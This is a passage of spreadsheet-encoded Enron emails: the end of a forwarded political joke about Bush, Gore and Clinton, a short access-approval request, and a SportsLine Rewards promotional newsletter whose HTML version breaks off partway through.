&gt; &gt; &gt; &gt;  &gt; &gt;?????? cross the Jordan River._x000D_
&gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? Finally George W. Bush volunteered to  go first.? Slowly he_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? began? to wade out into the river,  and slowly the water_x000D_
&gt; began to_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? get higher and higher, reaching to his  waist.? George_x000D_
began_x000D_
&gt; to_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? sweat, thinking all of his sins were  coming back to haunt_x000D_
&gt; him._x000D_
&gt; &gt; &gt;He_x000D_
&gt; &gt; &gt; &gt;  &gt; &gt;?????? was beginning to wonder if he  would ever see the other_x000D_
side._x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? Finally, after what seemed liked an  eternity, he began to_x000D_
&gt; emerge_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? on the river's bank._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? As he ascended to the other side, he  looked behind him to_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? see which one of the other brave souls  was going next.? A_x000D_
&gt; shock_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? of surprise registered on his face, as  he saw Al Gore_x000D_
almost_x000D_
&gt; in_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? the middle of the river and only his  ankles barely_x000D_
touching_x000D_
&gt; the_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? water.? He turned to Michael and  exclaimed, "I know Al_x000D_
Gore,_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? Al? Gore is a friend of mine, and  he has sinned much, much_x000D_
&gt; more_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? than? that!"_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? Before the Archangel Michael could  reply, Al Gore shouted_x000D_
&gt; back,_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? "I'm standing on Clinton's  shoulders!"_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;_x000D_
&gt; &gt; &gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;  &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 15:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Your approval is requested</t>
  </si>
  <si>
    <t>Stephanie_x000D_
_x000D_
Please grant Paul the requested eol rights_x000D_
_x000D_
Thanks,_x000D_
Phillip</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:29:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rewards_newsletter@sportsline.com'})</t>
  </si>
  <si>
    <t>Give Thanks For Great Rewards!</t>
  </si>
  <si>
    <t>--____________________________Next_x000D_
Content-Type: text/plain_x000D_
_x000D_
Rewards Newsletter_x000D_
November 19, 2001_x000D_
Issue Number 32_x000D_
_x000D_
_x000D_
Dear Matt,_x000D_
_x000D_
Home for the holidays? Home from work? Homing in on great Rewards for_x000D_
the Holidays! Thanksgiving is a wonderfully rewarding time for family_x000D_
and friends to be together. One great way to reward yourself this_x000D_
Thanksgiving is by cheering on your favorite NFL team with your new_x000D_
logo cap and BONUS Gifts from SportsLine Rewards! Become a PLUS member_x000D_
and we'll reward you! We'll give you 100 points just for looking!_x000D_
_x000D_
********************************************************_x000D_
To view an HTML version of this newsletter, click here:_x000D_
http://www.sportsline.com/u/newsletters/111501.htm_x000D_
*********************************************************_x000D_
_x000D_
For less than 11 cents a day, a PLUS membership will award you with_x000D_
the following bonus items:_x000D_
_x000D_
*NFL team logo cap of your choice_x000D_
*Sports Bloopers video_x000D_
*CBS SportsLine T-shirt_x000D_
*5,000 Bonus points_x000D_
*8 FREE issues of Sports Illustrated_x000D_
_x000D_
In addition, Rewards PLUS gives you:_x000D_
_x000D_
*Double points per-page-view; earned points never expire!_x000D_
*Access to PLUS only contests, auctions and local events_x000D_
*Half off everything in the Rewards catalog and more_x000D_
*Discounts on selected Fantasy products including $10.00 off the first_x000D_
 purchase of Fantasy Basketball and Hockey Gold Single Game as well as_x000D_
 $10.00 off Fantasy Basketball and Hockey Gold Commissioner_x000D_
_x000D_
And Much, Much More..._x000D_
_x000D_
Interested? Click on the link below to EARN 100 points and get more_x000D_
information on how to receive your BONUS gifts!_x000D_
http://sportsline.com/u/rewards/upgradeplusrd.htm_x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
Enter PLUS-only contests for a chance to WIN great Prizes!_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Hockey Mania Sweepstakes!_x000D_
_x000D_
Want to look like Mario Lemieux? Or better yet, play like him?_x000D_
Become a PLUS member, and you could win an autographed Mario Lemieux_x000D_
jersey, EA Sports NHL 2002 or "The best of the Bare Naked Ladies" new_x000D_
CD! It only takes a minute to get a chance to win, so sign up now--_x000D_
It's better than scoring in overtime! Click here!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetexthockeymania.cgi_x000D_
_x000D_
Email the Pros Q&amp;A Contest - Win Autographed Memorabilia!_x000D_
_x000D_
Exclusive Q&amp;A Contests with your favorite celebrities!_x000D_
E-mail heavyweight boxer Lennox Lewis and one lucky member_x000D_
wins a signed Boxing Glove! Coming up next: CBS Expert Greg_x000D_
Gumbel - Win a NFL Today Show Autographed football!_x000D_
Email your best questions today!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextlennoxqa.cgi_x000D_
_x000D_
~~~~~~~~~~~~~~~~_x000D_
Special Offers_x000D_
~~~~~~~~~~~~~~~_x000D_
Play Planters Crunch Time: Kickoff Now!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextplanters.cgi_x000D_
_x000D_
Win a VIP Vegas Vacation! OR Win $600 CASH!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextvipvegas.cgi_x000D_
_x000D_
ATTENTION REWARDS SHOPPERS......Start Your Holiday Shopping Early._x000D_
Great Gift Ideas &amp; Holiday Specials for the entire family. From_x000D_
Bikes,Fitness, Hockey, Golf &amp; More..........to We'll Even Pay You_x000D_
To SHOP! Find out how!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextmvpholiday.cgi_x000D_
_x000D_
Go to the Rose Bowl! Would you like to find out how you can see_x000D_
this year's BCS Championship Game? Click here!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextrosebowl.cgi_x000D_
_x000D_
Get a Sportsline.com exclusive with the best Dish Network Deal on_x000D_
the web. Free Dish with 2 receivers, Fox Regional Sports Package_x000D_
included, Free Installation, Free Extended Warranty. (Upgrade to_x000D_
PLUS and receive 10,000 Bonus points and a $25 MVP.com coupon!) Click here!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextdishdeal.cgi_x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
Earn BIG-TIME Rewards Points!_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
Bonus Partner - Earn 10 Rewards Points for checking out_x000D_
Coach Illustrated!_x000D_
_x000D_
Give yourself and the football lovers on your list the gift of_x000D_
football. Coach Illustrated delivers the most intense football_x000D_
coverage on the web year-round. No one gets you behind the scenes_x000D_
like we do by bringing you exclusive Up Close interviews and_x000D_
sneaking you into the practice sessions of the game's top_x000D_
coaches - including, Penn State's Joe Paterno, South Carolina's_x000D_
Lou Holtz and the Cleveland Browns' Butch Davis. Take advantage_x000D_
of this special offer and receive 2000 bonus points._x000D_
http://www.sportsline.com/links/2/42/5/3/freetextcoachesillrd.cgi_x000D_
_x000D_
Win a DVD Player with Daily Sports Trivia! Think you know sports?_x000D_
Prove it! Play trivia everyday for a chance to win 510 rewards_x000D_
points &amp; a DVD player!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetexttrivia.cgi_x000D_
_x000D_
Earn BIG and have FUN with Fantasy Hockey 2001!_x000D_
Sign up for Fantasy Hockey GOLD and earn 500 Rewards Points!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextftsyhockey.cgi_x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~_x000D_
Redeem for cool stuff!_x000D_
~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Football Tix! Pro Football games in a stadium near YOU!_x000D_
http://cbs.sportsline.com/links/2/42/5/3/freetextprofootballtix.cgi_x000D_
_x000D_
Will Miami go to the Rose Bowl? See for yourself._x000D_
http://www.sportsline.com/links/2/42/5/3/freetextrosebowllocalevent.cgi_x000D_
_x000D_
BID NOW for you very own Color Palm Pilot IIIC!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextredeempalmpilot.cgi_x000D_
_x000D_
Want to WIN your Fantasy League? Get the Fantasy Sports Backroom Collection_x000D_
Have the inside information at the tip of your fingers!_x000D_
http://www.sportsline.com/links/2/42/5/3/freetextfantsybackroomredeem.cgi_x000D_
_x000D_
NEXT MONTH'S NEWSLETTER:_x000D_
_x000D_
Special Holiday Edition, filled with great stocking stuffers and member_x000D_
exclusives!_x000D_
_x000D_
_x000D_
_x000D_
***************************************************************************_x000D_
You received this e-mail because you registered on CBS SportsLine.com._x000D_
If you do not want to receive these e-mail offers you can unsubscribe by_x000D_
clicking this link:_x000D_
http://www.sportsline.com/u/newsletters/newsletter.cgi?email=matthew.lenhart@enron.com_x000D_
or by replying to this message with "unsubscribe" in the subject line._x000D_
_x000D_
You are subscribed as [{(matthew.lenhart@enron.com)}]._x000D_
_x000D_
Although we are sending this e-mail to you, SportsLine.com is not responsible_x000D_
for the advertisers'content and makes no warranties or guarantees about the_x000D_
products or services advertised._x000D_
_x000D_
SportsLine.com takes your privacy seriously. To learn more about_x000D_
SportsLine.com's use of personal information, please read our Privacy_x000D_
Statement at http://www.sportsline.com/u/userservices/privacy.htm_x000D_
*****************************************************************************_x000D_
_x000D_
--____________________________Next_x000D_
Content-Type: text/html_x000D_
_x000D_
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;_x000D_
&lt;html&gt;_x000D_
&lt;head&gt;&lt;title&gt;SportsLine Rewards Newsletter&lt;/title&gt;_x000D_
&lt;meta name="description" content="SportsLine Rewards Newsletter"&gt;_x000D_
&lt;meta name="keywords" content="SportsLine Rewards Newsletter"&gt;_x000D_
&lt;/head&gt;_x000D_
&lt;body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="#3335CC"&gt;_x000D_
&lt;!-- Rewards Newsletter Date and Issue Number Information --&gt;_x000D_
&lt;table width="624" cellpadding="3" cellspacing="0" border="0"&gt;_x000D_
&lt;tr bgcolor="#FF8500"&gt;_x000D_
	&lt;td&gt;&lt;font face="arial, verdana, sans-serif" size="2" color="#000000"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;Rewards&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
	&lt;td align="center"&gt;&lt;font face="arial, verdana, sans-serif" size="2"_x000D_
color="#000000"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;November 19&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
	&lt;td align="right"&gt;&lt;font face="arial, verdana, sans-serif" size="2" color="#000000"&gt;&lt;b&gt;Issue_x000D_
Number&amp;nbsp;&amp;nbsp;32&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;!-- End Newsletter Date and Issue Information --&gt;_x000D_
_x000D_
&lt;table cellpadding="0" cellspacing="0" width="624" border="0"&gt;_x000D_
&lt;tr&gt;&lt;td width="640" bgcolor="#FF8500"&gt;_x000D_
	&lt;table cellpadding="0" cellspacing="1" width="100%" border="0"&gt;_x000D_
	&lt;tr valign=top&gt;&lt;td bgcolor="#ffffff"&gt;_x000D_
&lt;!-- Header --&gt;_x000D_
&lt;table width="590" cellspacing="0" cellpadding="0" border="0"&gt;_x000D_
&lt;tr valign="top"&gt;_x000D_
	&lt;td width="1" bgcolor="#A56001"&gt;&lt;spacer type=block height="1" width="1"&gt;&lt;/td&gt;_x000D_
	&lt;td&gt;&lt;img src="http://www.sportsline.com/images/rewards/newsletter/rewards-thanks_hdr.gif" width="368" height="60"_x000D_
border="0" alt="Rewards"&gt;&lt;/td&gt;_x000D_
	&lt;td&gt;&lt;a href="http://www.sportsline.com" target="_new"&gt;&lt;img src="http://www.sportsline.com/images/hdr_g.gif"_x000D_
width="221" height="60" alt="CBS SportsLine" border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;!-- End Header --&gt;_x000D_
_x000D_
&lt;!-- Main Content --&gt;_x000D_
	&lt;table width="580" border="0" cellpadding="0" cellspacing="0"&gt;_x000D_
	&lt;tr&gt;&lt;td colspan=2&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;_x000D_
				&lt;table width="580" cellspacing="0" cellpadding="0" border="0" valign="top"&gt;_x000D_
				  &lt;tr valign="top"&gt;_x000D_
				   &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
				   &lt;td&gt;&lt;font face="arial, verdana, sans-serif" size="2"&gt;_x000D_
					&lt;b&gt;Dear Matt,&lt;/b&gt;_x000D_
					&lt;br&gt;_x000D_
					&lt;img src="http://images.sportsline.com/images/newsletter/tracker_rewardsfree.gif"_x000D_
width="1" height="1" border="0"&gt;_x000D_
					&lt;br&gt;_x000D_
					Home for the holidays? Home from work? Homing in on great Rewards for the Holidays!_x000D_
					Thanksgiving is a wonderfully rewarding time for family and friends to be together._x000D_
One_x000D_
					great way to reward yourself this Thanksgiving is by cheering on your favorite NFL_x000D_
team with_x000D_
					your new logo cap and BONUS Gifts from SportsLine Rewards!  Become a PLUS member and_x000D_
we'll_x000D_
					reward you! We'll give you 100 points just for looking!_x000D_
					&lt;p&gt;_x000D_
					&lt;table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"_x000D_
valign="top"&gt;_x000D_
					&lt;tr&gt;_x000D_
					&lt;td width="150" align="center" valign="top"&gt;&lt;a_x000D_
href="http://www.sportsline.com/u/rewards/upgradeplusrd.htm" target="_new"&gt;&lt;img_x000D_
src="http://sportsline.com/images/rewards/newsletter/111061_150x100.gif" width="150" height="150" border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
					&lt;td width="25"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
					&lt;td width="400"&gt;&lt;font face="arial, verdana, sans-serif" size="2" color="#000000"&gt;_x000D_
					&lt;p&gt;_x000D_
					For less than 11 cents a day, a PLUS membership will award you with the following_x000D_
bonus items:&lt;br&gt;_x000D_
					&lt;ul&gt;_x000D_
					&lt;li&gt;NFL team logo cap of your choice_x000D_
			 		&lt;li&gt;Sports Bloopers video_x000D_
					&lt;li&gt;CBS SportsLine T-shirt_x000D_
					&lt;li&gt;5,000 Bonus points_x000D_
					&lt;li&gt;8 FREE issues of Sports Illustrated_x000D_
					&lt;/ul&gt;_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;_x000D_
					&lt;/table&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"_x000D_
valign="top"&gt;_x000D_
					&lt;tr&gt;_x000D_
					&lt;td width="400"&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="2" color="#000000"&gt;_x000D_
	        		In addition, Rewards PLUS gives you: &lt;br&gt;_x000D_
 					&lt;ul&gt;_x000D_
					&lt;li&gt;Double points per-page-view; earned points never expire!_x000D_
					&lt;li&gt;Access to PLUS only contests, auctions and local events_x000D_
					&lt;li&gt;Half off everything in the Rewards catalog and more_x000D_
					&lt;li&gt;Discounts on selected Fantasy products including $10.00 off the first_x000D_
					purchase of Fantasy Basketball and Hockey Gold Single Game as well as $10.00_x000D_
					off Fantasy Basketball and Hockey Gold Commissioner_x000D_
					&lt;li&gt;And much, much more..._x000D_
					&lt;/ul&gt;_x000D_
					&lt;p&gt;_x000D_
					Interested? &lt;A HREF="http://www.sportsline.com/u/rewards/upgradeplusrd.htm"_x000D_
target="_new"&gt;Click here to EARN 100 points&lt;/a&gt; and get more information on how to receive your BONUS gifts!_x000D_
					&lt;/font&gt;&lt;/td&gt;_x000D_
					&lt;td width="25"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
					&lt;td width="180" align="left"&gt;_x000D_
						&lt;table width="180" border="0" cellpadding="1" cellspacing="0"_x000D_
bgcolor="#FF8500" align="right"&gt;_x000D_
				        &lt;tr&gt;&lt;td&gt;_x000D_
					 		&lt;table width="100%" border="0" cellpadding="3" cellspacing="0"_x000D_
bgcolor="#ffffff" align="right"&gt;_x000D_
							&lt;tr valign="top"&gt;_x000D_
							&lt;td width="180" align="center" bgcolor=#FF8500 colspan="2"&gt;&lt;FONT_x000D_
face=verdana,arial,helvetica color=#ffffff size=1&gt;&lt;B&gt;SPECIAL OFFERS&lt;/B&gt;&lt;/FONT&gt;_x000D_
							&lt;/td&gt;&lt;/tr&gt;_x000D_
							&lt;tr&gt;&lt;td bgcolor=#ffffff&gt;&lt;A_x000D_
href="http://www.sportsline.com/links/2/42/5/1/htmlfreeplanters.cgi" target="_new"&gt;&lt;img height="65" alt=""_x000D_
src="http://www.sportsline.com/images/rewards/newsletter/crunck_logo.gif" width="65" border="0" nosend="1"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td_x000D_
align="left" width="180"&gt;&lt;FONT face="arial, verdana, sans-serif" size=2&gt;&lt;b&gt;Planters&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;_x000D_
							&lt;FONT face="arial, verdana, sans-serif" size=1&gt;Play Crunch Time!&lt;BR&gt;&lt;A_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlplanters.cgi" target="_new"&gt;Kickoff Now&lt;/A&gt;&lt;/FONT&gt;_x000D_
							&lt;/td&gt;&lt;/tr&gt;_x000D_
							&lt;tr valign=top&gt;&lt;td&gt;&lt;A_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlvipvegas.cgi" target="_new"&gt;&lt;img_x000D_
src="http://www.sportsline.com/images/rewards/newsletter/vegas_logo.gif" alt="" border="0" height="65" width="65"_x000D_
nosend="1"&gt;&lt;/A&gt;&lt;/TD&gt;_x000D_
	       					&lt;TD align=left&gt;&lt;FONT face="arial, verdana, sans-serif" size=2&gt;&lt;B&gt;VIP Vegas_x000D_
Vacation!&lt;/B&gt;&lt;/FONT&gt;_x000D_
							&lt;br&gt;&lt;FONT face="arial, verdana, sans-serif" size=1&gt;Win a VIP Vegas_x000D_
Vacation!&lt;BR&gt;_x000D_
							OR Win $600 CASH! &lt;br&gt;&lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/1/freehtmlvipvegas.cgi" target="_new"&gt;Click Here!&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
							&lt;/tr&gt;_x000D_
							&lt;/table&gt;_x000D_
							&lt;/td&gt;_x000D_
						 &lt;/tr&gt;_x000D_
						 &lt;/table&gt;_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;_x000D_
					&lt;/table&gt;_x000D_
_x000D_
					&lt;p&gt;_x000D_
					&lt;img src="http://www.sportsline.com/images/rewards/newsletter/exclusiveoffers.gif"_x000D_
width="219" height="44" border="0"&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;table&gt;&lt;tr&gt;&lt;td&gt;&lt;font face="arial, verdana, sans-serif" size="2" color="#000000"&gt;_x000D_
					&lt;b&gt;Hockey Mania Sweepstakes!&lt;/b&gt;&lt;br&gt;_x000D_
					Want to look like Mario Lemieux? Or better yet, play like him? Become a PLUS member,_x000D_
					and you could win an autographed Mario Lemieux jersey, EA Sports NHL 2002 or "The Best_x000D_
of_x000D_
					the Bare Naked Ladies" new CD! It only takes a minute to get a chance to win, so_x000D_
					sign up now-- it's better than scoring in overtime! &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlhockeymania.cgi" target="_new"&gt;Click here!&lt;/a&gt;_x000D_
					&lt;p&gt;_x000D_
_x000D_
					&lt;b&gt;Email the Pros Q&amp;A Contest - Win Autographed Memorabilia! &lt;/b&gt;_x000D_
					&lt;br&gt;_x000D_
					Exclusive Q&amp;A Contests with your favorite celebrities! E-mail heavyweight_x000D_
					boxer Lennox Lewis and one lucky member wins a signed Boxing Glove!_x000D_
					Coming up next: CBS Expert Greg Gumbel - Win a NFL Today Show Autographed football!_x000D_
					&lt;a href="http://www.sportsline.com/links/2/42/5/3/freehtmllennoxqa.cgi"_x000D_
target="_new"&gt;Email your best questions today!&lt;/a&gt;_x000D_
					&lt;/font&gt;_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;&lt;/table&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;table&gt;_x000D_
					&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.sportsline.com/links/2/42/5/3/freehtmlmvpholiday.cgi"_x000D_
target="_new"&gt;&lt;img src="http://www.sportsline.com/images/rewards/newsletter/111030_120x60mvpshop.gif" align="left"_x000D_
border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
					&amp;nbsp;&lt;td&gt;&lt;font face="arial, verdana, sans-serif" size="2"&gt;&lt;b&gt;ATTENTION REWARDS_x000D_
SHOPPERS&lt;/b&gt;......_x000D_
					Start Your Holiday Shopping Early. Great Gift Ideas &amp; Holiday Specials for the_x000D_
					entire family. From Bikes, Fitness, Hockey, Golf &amp; More..........to  We'll Even_x000D_
					Pay You To SHOP! &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlmvpholiday.cgi" target="_new"&gt;Find out how!&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
				&lt;/tr&gt;_x000D_
				&lt;/table&gt;_x000D_
				&lt;p&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="2"&gt;&lt;b&gt;Go to the Rose Bowl! &lt;/b&gt;Would you_x000D_
like to find out how you can and see_x000D_
					this year's BCS Championship Game? &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/htmltextrosebowl.cgi" target="_new"&gt;Click here!&lt;/a&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;b&gt;Get the Best Dish Network Deal on the Web!&lt;/b&gt; A SportsLine.com exclusive _x000D_
					that includes a Free Dish with 2 receivers, Fox Regional Sports Package_x000D_
					included, Free Installation, Free Extended Warranty. &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmldishdeal.cgi" target="_new"&gt;Click here!&lt;/a&gt;&lt;/font&gt;_x000D_
				&lt;p&gt;_x000D_
_x000D_
				&lt;table width="580" cellspacing="0" cellpadding="0" border="0" valign="top"&gt;_x000D_
				&lt;tr valign="top"&gt;_x000D_
				&lt;td width="1" bgcolor="#B56139"&gt;&lt;spacer type="block" height="1" width="1"&gt;&lt;/td&gt;_x000D_
				&lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;_x000D_
				&lt;td&gt;_x000D_
_x000D_
					&lt;!--Special event image and text--&gt;_x000D_
					&lt;table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"_x000D_
valign="top"&gt;_x000D_
					&lt;tr&gt;&lt;td width="580" align=middle"&gt;&lt;img_x000D_
src="http://www.sportsline.com/images/rewards/newsletter/earnpoints.gif" width="165" height="44" border="0"&gt;_x000D_
						&lt;table&gt;_x000D_
						&lt;tr&gt;&lt;td&gt;&lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlcoachesillrd.cgi" target="_new"&gt;&lt;img_x000D_
src="http://www.sportsline.com/images/rewards/vendor/logocoaches-thumb.gif" align="left" border="0"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
					&amp;nbsp;&lt;td&gt;&lt;font face="arial, verdana, sans-serif" size="2"&gt;&lt;b&gt;Bonus Partner -_x000D_
					Earn 10 Rewards Points for checking out Coach Illustrated!&lt;/b&gt; Give yourself_x000D_
					and the football lovers on your list the gift of football and_x000D_
					&lt;b&gt;earn 2000 bonus points!&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;_x000D_
						&lt;/tr&gt;_x000D_
						&lt;/table&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="2"&gt;&lt;b&gt;Coach Illustrated&lt;/b&gt;_x000D_
					delivers the most intense football coverage on the web_x000D_
					year-round. No one gets you behind the scenes like we do by bringing you_x000D_
					exclusive Up Close interviews and sneaking you into the practice sessions of_x000D_
					the game's top coaches - including, Penn State's Joe Paterno, South Carolina's_x000D_
					Lou Holtz and the Cleveland Browns' Butch Davis. &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlcoachesillrd.cgi" target="_new"&gt;Take advantage of this special offer_x000D_
and receive 2000 bonus points.&lt;/a&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;b&gt;Win a DVD Player with Daily Sports Trivia!&lt;/b&gt; Think you know sports? Prove it!_x000D_
					&lt;a href="http://www.sportsline.com/links/2/42/5/3/freehtmltrivia.cgi"_x000D_
target="_new"&gt;Play trivia everyday&lt;/a&gt; for a chance to win 510 rewards points &amp; a DVD player!_x000D_
					&lt;p&gt;_x000D_
					&lt;b&gt;Earn BIG and have FUN with Fantasy Hockey 2001!&lt;/b&gt;_x000D_
					&lt;a href="http://www.sportsline.com/links/2/42/5/3/freehtmlftsyhockey.cgi"_x000D_
target="_new"&gt;Sign up for Fantasy Hockey GOLD&lt;/a&gt; and earn 500 Rewards Points!_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;_x000D_
					&lt;/table&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;table width="100%" cellpadding="0" cellspacing="0" border="0" align="center"_x000D_
valign="top"&gt;_x000D_
					&lt;tr&gt;&lt;td width="580" align=middle"&gt;&lt;img_x000D_
src="http://www.sportsline.com/images/rewards/newsletter/redeempoints.gif" width="219" height="44" border="0"&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="2"&gt;&lt;b&gt;Football Tix!&lt;/b&gt; &lt;a_x000D_
href="http://cbs.sportsline.com/links/2/42/5/3/freehtmlprofootballtix.cgi" target="_new"&gt;Pro Football games&lt;/a&gt; in a stadium_x000D_
near YOU!_x000D_
					&lt;p&gt;_x000D_
					Will Miami go to the Rose Bowl?  - &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlrosebowllocalevent.cgi" target="_new"&gt;See for yourself!&lt;/a&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;a href="http://www.sportsline.com/links/2/42/5/3/freehtmlredeempalmpilot.cgi"_x000D_
target="_new"&gt;_x000D_
					BID NOW&lt;/a&gt; for you very own Color Palm Pilot IIIC!_x000D_
					&lt;p&gt;_x000D_
					&lt;b&gt;Want to WIN your Fantasy League?&lt;/b&gt; &lt;a_x000D_
href="http://www.sportsline.com/links/2/42/5/3/freehtmlfantsybackroomredeem.cgi" target="_new"&gt;Get the Fantasy Sports Backroom_x000D_
					Collection&lt;/a&gt;. Have the inside information at the tip of your fingers! &lt;/font&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;div align="center"&gt;&lt;b&gt;&lt;font face="arial, verdana, sans-serif" size="2"_x000D_
color="#FF8500"&gt;NEXT MONTH'S NEWSLETTER:&lt;/font&gt;&lt;BR&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="2" color="#FF8500"&gt;Special Holiday_x000D_
Edition, filled with great stocking stuffers and member exclusives!&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;_x000D_
_x000D_
					&lt;/td&gt;_x000D_
					&lt;/tr&gt;_x000D_
					&lt;/table&gt;_x000D_
					&lt;p&gt;&amp;nbsp;&lt;p&gt;_x000D_
					&lt;font face="arial, verdana, sans-serif" size="1"&gt;_x000D_
					You received this e-mail because you registered on CBS SportsLine.com._x000D_
					If you do not want to receive these special e-mail offers you can unsubscribe_x000D_
					by clicking this link: &lt;a_x000D_
href="http://www.sportsline.com/u/newsletters/newsletter.cgi?email=matthew.lenhart@enron.com"_x000D_
target="_new"&gt;http://www.sportsline.com/u/newsletters/newsletter.cgi?email=matthew.lenhart@enron.com&lt;/a&gt;_x000D_
					or by replying to this message with &amp;quot;unsubscribe&amp;quot; in the subject line. You_x000D_
are subscribed as matthew.lenhart@enron.com.&lt;br&gt;_x000D_
_x000D_
					Although we are sending this e-mail to you, SportsLine.com is not responsible_x000D_
					for the advertisers' content and makes no warranties or guarantees about the products_x000D_
or_x000D_
					services advertised. SportsLine.com takes your privacy seriously. To learn more about_x000D_
					SportsLine.com's use of personal information, please read our Privacy Statement at_x000D_
					&lt;a href="http://cbs.sportsline.com/u/userservices/privacy.htm"_x000D_
target="_new"&gt;http://cbs.sportsline.com/u/userservices/privacy.htm&lt;/a&gt;_x000D_
					&lt;/font&gt;_x000D_
					&lt;p&gt;_x000D_
					&lt;!-- Footer --&gt;_x000D_
					&lt;table width="590" border="0" cellpadding="3" cellspacing="0" bgcolor="#FF8500"&gt;_x000D_
